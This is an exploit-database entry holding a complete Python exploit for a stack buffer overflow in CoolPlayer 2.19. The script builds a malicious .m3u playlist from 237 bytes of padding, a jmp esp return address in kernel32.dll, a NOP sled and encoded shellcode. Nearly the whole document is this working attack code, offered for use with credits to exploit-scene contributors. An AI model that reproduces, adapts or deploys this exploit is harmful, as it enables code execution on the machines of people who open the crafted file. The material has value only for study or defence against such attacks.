CoolPlayer219_Bin (.m3u) (buf+eip+nop / 253 byt) Buffer Overflow

2010-08-08T00:00:00
ID 1337DAY-ID-13618
Type zdt
Reporter ZoRLu
Modified 2010-08-08T00:00:00

Description

Exploit for windows platform in category local exploits

                                        
                                            =================================================================
CoolPlayer219_Bin (.m3u)  (buf+eip+nop / 253 byt) Buffer Overflow
=================================================================

#!/usr/bin/env python
#-*- coding:cp1254 -*-

print "**************************************************************************"
print " CoolPlayer219_Bin (.m3u)  (buf+eip+nop / 253 byt) Buffer Overflow Exploit (.py)\n "
print " Exploited: ZoRLu / [email protected] "
print " Thanks for first exploit : hadji samir (buf+eip+nop / 310 byt)"
print " Date: 08/08/2010 / Saat Gecenin 4 u "
print " Tested on: Windows Vista \n"
print " Home: z0rlu.blogspot.com "
print " Home: imhatimi.org "
print " Thanks: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N\n"
print "**************************************************************************"

karala = "\x41" * 237
eyip = "\x3D\x94\x0F\x77"  #0x770F943D      jmp esp / kernel32.dll
fiytiripat = "\x90" * 12
shell = (
	"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x38"
	"\x78\x73\x8a\x83\xeb\xfc\xe2\xf4\xc4\x90\x37\x8a\x38\x78\xf8\xcf"
	"\x04\xf3\x0f\x8f\x40\x79\x9c\x01\x77\x60\xf8\xd5\x18\x79\x98\xc3"
	"\xb3\x4c\xf8\x8b\xd6\x49\xb3\x13\x94\xfc\xb3\xfe\x3f\xb9\xb9\x87"
	"\x39\xba\x98\x7e\x03\x2c\x57\x8e\x4d\x9d\xf8\xd5\x1c\x79\x98\xec"
	"\xb3\x74\x38\x01\x67\x64\x72\x61\xb3\x64\xf8\x8b\xd3\xf1\x2f\xae"
	"\x3c\xbb\x42\x4a\x5c\xf3\x33\xba\xbd\xb8\x0b\x86\xb3\x38\x7f\x01"
	"\x48\x64\xde\x01\x50\x70\x98\x83\xb3\xf8\xc3\x8a\x38\x78\xf8\xe2"
	"\x04\x27\x42\x7c\x58\x2e\xfa\x72\xbb\xb8\x08\xda\x50\x88\xf9\x8e"
	"\x67\x10\xeb\x74\xb2\x76\x24\x75\xdf\x1b\x12\xe6\x5b\x78\x73\x8a"
        )
	

yazciz = karala + eyip + fiytiripat + shell
try:
	olustur = open("zrl.m3u","w")
	olustur.write(yazciz)
	olustur.close()
	print "Tamadir Exploit Hazir\n"
except:
	print "Dosya Olusturulamadi\n"



#  0day.today [2018-04-11]  #